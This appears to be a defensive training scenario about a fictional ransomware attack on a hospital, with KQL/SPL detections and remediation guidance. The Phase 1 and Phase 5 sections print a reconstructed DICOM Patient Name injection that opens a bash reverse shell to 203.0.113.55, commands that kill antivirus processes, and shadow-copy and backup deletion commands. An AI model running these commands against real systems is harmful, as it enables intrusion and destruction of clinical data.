
SC-054: Medical Device Ransomware

Scenario Overview

The ransomware group "CRIMSON PULSE" targets Greenfield Memorial Hospital, a 450-bed regional healthcare facility, by exploiting a known vulnerability in an internet-facing DICOM (Digital Imaging and Communications in Medicine) web viewer. After gaining initial access, the attackers discover a flat network architecture with no segmentation between clinical workstations, medical devices, and administrative systems. They pivot through the HL7 integration engine to reach infusion pump management servers, PACS (Picture Archiving and Communication System) storage, and the hospital's EHR backup infrastructure. CRIMSON PULSE encrypts critical clinical systems, causing the hospital to divert emergency patients for 72 hours, lose centralized infusion pump management, and operate radiology on paper-based workflows for 11 days.

Environment: Greenfield Memorial Hospital network at 10.80.0.0/16; medical device VLAN at 10.80.50.0/24 (not segmented); PACS at 10.80.30.10
Initial Access: Exploited internet-facing DICOM viewer — CVE-2026-XXXX (fictional) in OpenDICOM Viewer 4.2 (T1190)
Impact: 72-hour ER diversion, radiology offline 11 days, $8.5M estimated total cost
Difficulty: Intermediate
Sector: Healthcare


Threat Actor Profile

| Attribute | Details |
|---|---|
| Name | CRIMSON PULSE |
| Type | Financially motivated ransomware group |
| Motivation | Extortion — healthcare targets pay faster due to patient safety urgency |
| Capability | Intermediate — leverages known CVEs, commodity tooling, manual operations |
| Target Sector | Healthcare, pharmaceuticals, long-term care facilities |
| Active Since | 2025 (responsible for 14 known healthcare ransomware incidents) |
| TTPs | Exploit public-facing apps, flat network traversal, targeted clinical system encryption |

Attack Timeline

| Timestamp (UTC) | Phase | Action |
|---|---|---|
| 2026-03-05 (Day -8) | Reconnaissance | Shodan identifies exposed DICOM viewer at 192.0.2.80:8080 |
| 2026-03-05 22:30:00 | Initial Access | Exploit CVE-2026-XXXX RCE in OpenDICOM Viewer; reverse shell established |
| 2026-03-05 22:45:00 | Discovery | Network enumeration reveals flat topology — no segmentation between IT and medical devices |
| 2026-03-06 01:00:00 | Lateral Movement | Pivot from DICOM server (10.80.30.10) to HL7 integration engine (10.80.30.15) via SMB |
| 2026-03-06 02:30:00 | Discovery | Enumerate medical device network: infusion pumps, ventilators, patient monitors at 10.80.50.0/24 |
| 2026-03-06 04:00:00 | Credential Access | Dump credentials from HL7 engine — service account GHOSPITAL\svc-hl7 has local admin across clinical systems |
| 2026-03-06 06:00:00 | Lateral Movement | Access infusion pump management server (10.80.50.10) and PACS archive (10.80.30.20) |
| 2026-03-06 08:00:00 | Defense Evasion | Disable Windows Defender and Symantec Endpoint on targeted servers |
| 2026-03-06 10:00:00 | Collection | Exfiltrate 340GB of patient records and medical images for double extortion |
| 2026-03-07 02:00:00 | Impact — Pre-encryption | Delete Volume Shadow Copies, disable backups, stop SQL services |
| 2026-03-07 02:15:00 | Impact — Encryption | Deploy CRIMSONPULSE ransomware to PACS, infusion pump mgmt, EHR backup, radiology workstations |
| 2026-03-07 02:30:00 | Impact — Ransom Note | $3.2M ransom demand with 96-hour deadline; leak site threat |
| 2026-03-07 06:00:00 | Detection | Night shift nurses report infusion pump management console offline; IT confirms ransomware |

Technical Analysis

Phase 1: Initial Access — DICOM Viewer Exploitation

CRIMSON PULSE exploits a remote code execution vulnerability in an unpatched internet-facing DICOM web viewer.

# Vulnerability: CVE-2026-XXXX (fictional)
# Affected: OpenDICOM Viewer 4.2.1 (DICOM web viewer)
# Type: Unauthenticated Remote Code Execution via DICOM file upload
# CVSS: 9.8 (Critical)
# Patch available: Yes (v4.2.3, released 2026-01-15 — unpatched for 49 days)

# Exploit request (reconstructed from web server access logs):
# POST /api/dicom/upload HTTP/1.1
# Host: 192.0.2.80:8080
# Content-Type: multipart/form-data; boundary=---BOUNDARY
#
# -----BOUNDARY
# Content-Disposition: form-data; name="file"; filename="study.dcm"
# Content-Type: application/dicom
#
# [Crafted DICOM file with embedded command injection in Patient Name field]
# (0010,0010) PN: "; /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.55/4443 0>&1' #"
#
# Result: Reverse shell established to attacker C2 at 203.0.113.55:4443

# Server context:
# User: www-data (DICOM viewer runs as unprivileged user)
# Host: dicom-viewer01 (10.80.30.10)
# OS: Ubuntu 22.04 LTS
# Network: No firewall between DICOM server and internal medical network
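The bug class behind Phase 1, shown as an added illustration rather than OpenDICOM Viewer's own code: a DICOM header value interpolated into a shell command line, beside the hardened form that validates the PN value and passes it to the tool as a single argument with no shell in between. The render tool is hypothetical and `echo` stands in for it; the tainted sample value is constructed and is not the scenario's payload.

```python
"""Hardened handling of the DICOM PatientName value described in Phase 1."""
import re
import shlex
import subprocess

# Constructed sample values; the tainted one is NOT the scenario's payload.
BENIGN_PN = "DOE^JANE"
TAINTED_PN = "DOE^JANE'; echo INJECTED; echo '"   # shell metacharacters in a PN

def render_unsafe(patient_name: str) -> str:
    """BEFORE: the header value is interpolated into a command line and run
    with shell=True, so /bin/sh parses any metacharacters it carries.
    'echo' stands in for a hypothetical render tool."""
    cmd = f"echo '{patient_name}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def pn_is_valid(patient_name: str) -> bool:
    """DICOM PN value rules (PS3.5 section 6.2): at most three '='-separated
    component groups of 64 characters each, no backslash (the value
    delimiter) and no control characters. The standard does not exclude
    shell metacharacters, so validation alone cannot fix the bug."""
    groups = patient_name.split("=")
    bad = re.compile(r"[\\\x00-\x1f\x7f]")
    return len(groups) <= 3 and all(len(g) <= 64 and not bad.search(g) for g in groups)

def render_safe(patient_name: str) -> str:
    """AFTER: validate, then hand the value to the tool as one argv element
    with no shell in between; it arrives verbatim and nothing parses it."""
    if not pn_is_valid(patient_name):
        raise ValueError("PatientName rejected")
    return subprocess.run(["echo", patient_name], capture_output=True, text=True).stdout

def shell_safe_command(patient_name: str) -> str:
    """Defence in depth for code paths where a shell is unavoidable."""
    return f"echo {shlex.quote(patient_name)}"
```

With the tainted sample, `render_unsafe` prints INJECTED on its own line because the shell executed a second command, while `render_safe` prints the whole value literally.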

Phase 2: Network Discovery — Flat Medical Device Network

The attacker discovers the hospital has no network segmentation between IT systems and medical devices.

# Network enumeration from compromised DICOM server (10.80.30.10)
# Reconstructed from forensic analysis of bash history and network logs

# ARP scan reveals flat network:
# arp-scan 10.80.0.0/16
# 10.80.10.1    — Default gateway
# 10.80.10.10   — AD domain controller (ghospital.example.com)
# 10.80.20.10   — EHR application server
# 10.80.20.20   — EHR database server
# 10.80.30.10   — DICOM viewer (compromised host)
# 10.80.30.15   — HL7 integration engine (Mirth Connect)
# 10.80.30.20   — PACS archive server (2.4 TB medical images)
# 10.80.30.25   — Radiology workstation 1
# 10.80.30.26   — Radiology workstation 2
# 10.80.50.10   — Infusion pump management server (BD Alaris)
# 10.80.50.11   — Patient monitor central station
# 10.80.50.12   — Ventilator management gateway
# 10.80.50.20-80 — Individual infusion pumps (60 devices)
# 10.80.60.10   — Pharmacy dispensing cabinet controller

# Critical finding: ALL devices on same broadcast domain
# No VLANs, no ACLs, no micro-segmentation
# Medical devices directly accessible from any host on 10.80.0.0/16

Phase 3: Lateral Movement via HL7 Integration Engine

The attacker pivots through the HL7 integration engine, which has broad access to clinical systems.

# HL7 integration engine (Mirth Connect) at 10.80.30.15
# The HL7 engine bridges clinical systems — has credentials for most endpoints

# Attacker accesses Mirth Connect admin console (default credentials):
# URL: http://10.80.30.15:8443/
# Username: admin
# Password: admin  (default — never changed)

# Mirth Connect channel list reveals integration credentials:
# Channel: ADT-to-EHR
#   Destination: 10.80.20.10:2575 (HL7v2 MLLP)
#   Credentials: GHOSPITAL\svc-hl7 / REDACTED
#
# Channel: Orders-to-Pharmacy
#   Destination: 10.80.60.10:8080
#   Credentials: GHOSPITAL\svc-hl7 / REDACTED
#
# Channel: Results-to-PACS
#   Destination: 10.80.30.20:104 (DICOM C-STORE)
#   Credentials: GHOSPITAL\svc-hl7 / REDACTED

# svc-hl7 service account has local admin on all clinical servers
# — needed for HL7 message routing and integration
# Attacker uses these credentials for lateral movement

Phase 4: Medical Device Network Access

The attacker accesses the infusion pump management server and PACS archive.

# Lateral movement to infusion pump management server (10.80.50.10)
# Using svc-hl7 credentials via SMB

# net use \\10.80.50.10\C$ /user:GHOSPITAL\svc-hl7 REDACTED
# Command completed successfully.

# Infusion pump management server (BD Alaris System Manager):
# OS: Windows Server 2016 (EOL — no longer receiving security updates)
# Role: Central management for 60 infusion pumps
# Services:
#   - BD Alaris System Manager (port 443)
#   - Drug library distribution service (port 8080)
#   - Pump firmware update service (port 9090)

# Impact if encrypted:
# - Pumps continue running on last programmed settings
# - No central monitoring of infusion rates
# - No drug library updates
# - Manual programming required for new infusions
# - Significant patient safety risk

# PACS archive access (10.80.30.20):
# net use \\10.80.30.20\PACSArchive$ /user:GHOSPITAL\svc-hl7 REDACTED
# Archive contains 2.4TB of medical images (CT, MRI, X-ray, ultrasound)
# 147,000 patient studies spanning 8 years

Phase 5: Ransomware Deployment

CRIMSON PULSE deploys ransomware to the clinical servers, not to the medical devices themselves.

# Pre-encryption preparation (reconstructed from forensic timeline)
# Executed on each target server via remote PsExec

# 1. Disable security software
# taskkill /F /IM "ccSvcHst.exe"   # Symantec Endpoint Protection
# taskkill /F /IM "MsMpEng.exe"    # Windows Defender
# sc config WinDefend start= disabled

# 2. Delete shadow copies and disable recovery
# vssadmin delete shadows /all /quiet
# wbadmin delete catalog -quiet
# bcdedit /set {default} recoveryenabled No

# 3. Stop critical services before encryption
# net stop MSSQLSERVER  # EHR database
# net stop "BD Alaris System Manager"
# net stop "PACS Archive Service"
# net stop wbengine  # Windows Backup

# 4. Deploy CRIMSONPULSE ransomware
# Encrypted targets:
#   10.80.50.10 — Infusion pump management (BD Alaris)
#   10.80.30.20 — PACS archive (2.4TB medical images)
#   10.80.30.25-26 — Radiology workstations
#   10.80.20.20 — EHR backup database
#   10.80.30.15 — HL7 integration engine

# File extensions targeted:
# .dcm .hl7 .mdb .bak .sql .pdf .dicom .jpg .nii .nrrd

# Ransom note: CRIMSONPULSE_RECOVERY.txt
# "GREENFIELD MEMORIAL HOSPITAL
#  Your clinical systems have been encrypted by CRIMSON PULSE.
#  We have also downloaded 340GB of patient records.
#  Payment: 48 BTC ($3,200,000) within 96 hours
#  Failure to pay: patient records published on our leak site
#  Contact: crimsonpulse@securemail.example.com"

Detection Opportunities

KQL — Unusual DICOM Traffic Patterns

// Detect exploitation attempts against DICOM services
CommonSecurityLog
| where TimeGenerated > ago(7d)
| where DestinationPort in (104, 8080, 11112)  // DICOM ports
| where SourceIP !startswith "10."  // External sources
| summarize
    ConnectionCount = count(),
    UniquePayloads = dcount(RequestURL),
    DataVolume = sum(SentBytes)
    by SourceIP, DestinationIP, DestinationPort
| where ConnectionCount > 10
| sort by ConnectionCount desc

KQL — Medical Device Network Anomalous Access

// Detect IT systems accessing medical device management infrastructure
DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP startswith "10.80.50."  // Medical device subnet
| where LocalIP !startswith "10.80.50."  // Access from outside medical device network
| where RemotePort in (443, 445, 3389, 8080, 9090)
| summarize
    Connections = count(),
    UniquePorts = dcount(RemotePort),
    Ports = make_set(RemotePort)
    by DeviceName, LocalIP, RemoteIP, bin(TimeGenerated, 1h)
| where Connections > 5
| sort by Connections desc

KQL — HL7 Integration Engine Credential Abuse

// Detect service account usage outside normal HL7 integration patterns
SecurityEvent
| where TimeGenerated > ago(7d)
| where EventID in (4624, 4625)  // Logon events
| where TargetUserName == "svc-hl7"
| where LogonType in (3, 10)  // Network and RemoteInteractive
| where Computer !in ("HL7-ENGINE01", "EHR-APP01", "PACS-SRV01")  // Expected targets
| summarize
    LogonCount = count(),
    UniqueTargets = dcount(Computer),
    Targets = make_set(Computer)
    by IpAddress, bin(TimeGenerated, 1h)
| where UniqueTargets > 2
| sort by LogonCount desc

SPL — DICOM Exploitation Detection

index=network sourcetype="firewall"
  dest_port IN (104, 8080, 11112)
  NOT src_ip="10.*"
| stats count as connections
        dc(src_ip) as unique_sources
        sum(bytes_out) as total_bytes
        values(src_ip) as source_ips
        by dest_ip dest_port
| where connections > 20
| where total_bytes > 1000000
| sort -connections

SPL — Service Account Lateral Movement

index=wineventlog sourcetype="WinEventLog:Security"
  EventCode=4624 LogonType=3
  TargetUserName="svc-hl7"
| stats count as logons
        dc(Computer) as unique_hosts
        values(Computer) as target_hosts
        by IpAddress
| where unique_hosts > 3
| lookup approved_hl7_targets host AS target_hosts OUTPUT approved
| where NOT approved="true"
| sort -logons

SPL — Medical Device Network Encryption Activity

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=11
  Computer IN ("INFUSION-MGMT01", "PACS-SRV01", "RAD-WS01", "RAD-WS02")
| rex field=TargetFilename "\.(?<extension>[^.]+)$"
| where extension IN ("crimsonpulse", "locked", "encrypted", "enc")
| stats count as encrypted_files
        dc(Computer) as affected_hosts
        values(Computer) as host_list
        min(_time) as first_seen
        max(_time) as last_seen
        by Image
| where encrypted_files > 20
| sort -encrypted_files

SPL — Volume Shadow Copy Deletion on Clinical Systems

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=1
  (CommandLine="*vssadmin*delete*shadows*" OR
   CommandLine="*wbadmin*delete*catalog*" OR
   CommandLine="*bcdedit*recoveryenabled*No*")
  Computer IN ("INFUSION-MGMT01", "PACS-SRV01", "EHR-BACKUP01")
| stats count by Computer User CommandLine ParentImage _time
| sort _time
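An offline re-implementation of two of the detections above (the HL7 integration engine credential abuse query and the medical device network anomalous access query), run over constructed event records so the logic can be exercised without a SIEM. This is an added example, not part of the original scenario; the record field names and the sample events are assumed, shaped after the scenario's timeline.

```python
"""Offline re-implementation of two of the detections above, run over
constructed events so the logic can be checked without a SIEM."""
from collections import defaultdict
from datetime import datetime
import ipaddress

MEDICAL_SUBNET = ipaddress.ip_network("10.80.50.0/24")     # scenario's device subnet
MGMT_PORTS = {443, 445, 3389, 8080, 9090}                   # ports from the KQL query
APPROVED_HL7_TARGETS = {"HL7-ENGINE01", "EHR-APP01", "PACS-SRV01"}

def hl7_account_abuse(events, account="svc-hl7", min_unique=3):
    """Mirror of the 'HL7 Integration Engine Credential Abuse' KQL: logon
    events of type 3/10 for the service account onto hosts outside the
    approved set, bucketed per source IP and hour; flag sources that reached
    min_unique or more distinct hosts (KQL: UniqueTargets > 2)."""
    targets = defaultdict(set)
    for e in events:
        if e["EventID"] not in (4624, 4625) or e["TargetUserName"] != account:
            continue
        if e["LogonType"] not in (3, 10) or e["Computer"] in APPROVED_HL7_TARGETS:
            continue
        hour = datetime.fromisoformat(e["Time"]).replace(minute=0, second=0)
        targets[(e["IpAddress"], hour)].add(e["Computer"])
    return {ip: sorted(h) for (ip, _), h in targets.items() if len(h) >= min_unique}

def medical_subnet_access(flows, min_connections=5):
    """Mirror of the 'Medical Device Network Anomalous Access' KQL: connections
    on management ports into the device subnet from hosts outside it."""
    counts = defaultdict(int)
    for f in flows:
        src, dst = ipaddress.ip_address(f["LocalIP"]), ipaddress.ip_address(f["RemoteIP"])
        if dst in MEDICAL_SUBNET and src not in MEDICAL_SUBNET and f["RemotePort"] in MGMT_PORTS:
            counts[f["LocalIP"]] += 1
    return {ip: n for ip, n in counts.items() if n >= min_connections}

# Constructed sample records shaped after the scenario timeline (Day 2, 06:00).
def _logon(host, logon_type=3, minute=0):
    return {"Time": f"2026-03-06T06:{minute:02d}:00", "EventID": 4624, "LogonType": logon_type,
            "TargetUserName": "svc-hl7", "Computer": host, "IpAddress": "10.80.30.15"}

SAMPLE_LOGONS = [_logon(h) for h in ("INFUSION-MGMT01", "PACS-SRV01", "RAD-WS01",
                                      "RAD-WS02", "EHR-BACKUP01")]
SAMPLE_LOGONS += [_logon("EHR-APP01", minute=10),               # approved target, ignored
                  _logon("RAD-WS01", logon_type=2, minute=20)]  # interactive logon, ignored
SAMPLE_FLOWS = [{"LocalIP": "10.80.30.15", "RemoteIP": "10.80.50.10", "RemotePort": p}
                for p in (445, 445, 443, 8080, 9090, 3389)]
SAMPLE_FLOWS.append({"LocalIP": "10.80.50.11", "RemoteIP": "10.80.50.10", "RemotePort": 443})
```

On the sample data the HL7 engine's address is flagged for reaching four unexpected hosts in one hour, and for six management-port connections into the device subnet; the intra-subnet flow is ignored as the query intends.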

MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name | Scenario Phase |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | DICOM viewer RCE exploitation |
| Discovery | T1046 | Network Service Scanning | Flat network enumeration |
| Credential Access | T1552.001 | Unsecured Credentials: Credentials in Files | HL7 engine stored credentials |
| Lateral Movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | SMB pivot to clinical servers |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Disabled Symantec and Defender |
| Collection | T1039 | Data from Network Shared Drive | Patient records exfiltration |
| Impact | T1486 | Data Encrypted for Impact | CRIMSONPULSE ransomware encryption |
| Impact | T1489 | Service Stop | Stopped SQL, PACS, Alaris services |
| Impact | T1490 | Inhibit System Recovery | Shadow copy and backup deletion |

Impact Assessment

| Impact Category | Assessment |
|---|---|
| Patient Safety | Critical — infusion pumps lost central monitoring; manual programming required |
| Clinical Operations | ER diversion for 72 hours; radiology paper-based for 11 days |
| Financial | $8.5M total (ransom not paid; recovery + regulatory + legal) |
| Regulatory | HIPAA breach notification for 147,000 patients; HHS/OCR investigation |
| Reputational | Loss of community trust; patient volume decline for 6+ months |
| Medical Records | 2.4TB of medical imaging data inaccessible for 11 days |

Remediation & Hardening

Immediate Actions

  1. Activate clinical downtime procedures — switch to paper-based workflows for all affected departments
  2. Isolate compromised systems — network-disconnect PACS, infusion pump management, HL7 engine
  3. Verify infusion pump safety — clinical engineering confirms all pumps operating on local settings
  4. Block attacker infrastructure — 203.0.113.55 at perimeter firewall
  5. Preserve forensic evidence — disk images and memory captures of all encrypted servers
  6. Activate patient diversion protocols — coordinate with regional hospitals for ER overflow

Long-Term Hardening

  1. Network segmentation — isolate medical devices into dedicated VLANs with strict ACLs (IEC 80001-1 compliant)
  2. Patch management for medical devices — establish FDA-coordinated vulnerability disclosure response process
  3. Remove DICOM viewer from internet — place behind VPN with MFA for external radiologist access
  4. Harden HL7 integration engine — change default credentials, implement least-privilege service accounts
  5. Deploy medical device monitoring — passive network monitoring for anomalous clinical protocol traffic
  6. Immutable backups — air-gapped backup solution for PACS, EHR, and clinical databases
  7. Tabletop exercises — quarterly ransomware tabletop exercises including clinical downtime procedures

Discussion Questions

  1. How should hospitals balance the need for medical device interoperability with network segmentation requirements?
  2. What are the ethical considerations of ransomware groups explicitly targeting healthcare organizations?
  3. How can legacy medical devices (running EOL operating systems) be protected when vendor patches are unavailable?
  4. What role should the FDA play in mandating cybersecurity standards for connected medical devices?
  5. How should a hospital CISO prioritize patient safety vs. forensic evidence preservation during an active ransomware incident?
  6. What minimum viable network segmentation would have prevented lateral movement from the DICOM server to infusion pump management?

Cross-References